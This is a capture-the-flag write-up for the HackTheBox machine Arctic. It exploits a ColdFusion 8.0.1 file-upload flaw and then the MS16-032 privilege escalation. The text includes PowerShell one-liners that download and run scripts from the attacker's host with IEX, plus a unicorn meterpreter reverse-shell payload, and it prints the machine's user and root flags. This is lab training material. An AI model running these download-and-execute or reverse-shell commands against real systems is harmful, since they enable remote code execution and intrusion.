Arctic – HackTheBox

by

jdksec
in

Arctic 10.10.10.11

Target Enumeration:

OS: Windows 2008

IP: 10.10.10.11

User: 02650d3a69a70780c302e146a6cb96f3

Root: ce65ceee66b2b5ebaff07e50508ffb90

Ports / Services / Software Versions Running

135/tcp open msrpc Microsoft Windows RPC
8500/tcp open http JRun Web Server
49154/tcp open msrpc Microsoft Windows RPC

Vulnerability Exploited:

ColdFusion 8.0.1 Arbitrary File Upload and Execute

This module exploits the Adobe ColdFusion 8.0.1 FCKeditor ‘CurrentFolder’ File Upload and Execute vulnerability.

image

Privilege Escalation:

MS16-032 Secondary Logon Handle Privilege Escalation

This module exploits the lack of sanitization of standard handles in Windows’ Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.

Replicating the exploit:

Nmap TCP

image

Webapp on port 8500

image

Dir search

image

Administrator gives a version 8

image

Searchsploit

image

Found the metasploit version of the exploit

image

Set options as follows

image

Start burp listener on port 127.0.0.1:8500
Check it works in the browser

image

Capture the request in burp

image

Check the filename it is writing to.

image

Navigate to that file via the browser and set up your nc listener on port 4444

image

Like so

image

Gather system info etc

image

Grab user file
Execute Sherlock.ps1 after copying it to your pwd and starting your webserver.

echo IEX(New-Object Net.WebClient).DownloadString(“http://10.10.14.2/Invoke-MS16032.ps1″) | powershell -noprofile –

Did not work so try getting a meterpreter shell instead.

git clone image

python unicorn.py windows/meterpreter/reverse_tcp 10.10.14.2 4445

msfconsole -r unicorn.rc

cat powershell_attack.txt > exploit.html

Nano exploit.html
Delete powershell etc to “sv including the single quote and the quote at the end.

Copy to your webserver

Run the following on Artic

powershell “iex(new-object net.webclient).downloadstring(‘image‘)”

image

Check meterpreter

image

Run local exploit suggester (32 bit)

image

This ran as 32 bit so switch to meterpreter and change to a 64 bit process

image

Only one as 64 bit

image

Set your options as follows:

image

Run the exploit to get a system shell.

image

Root.txt

image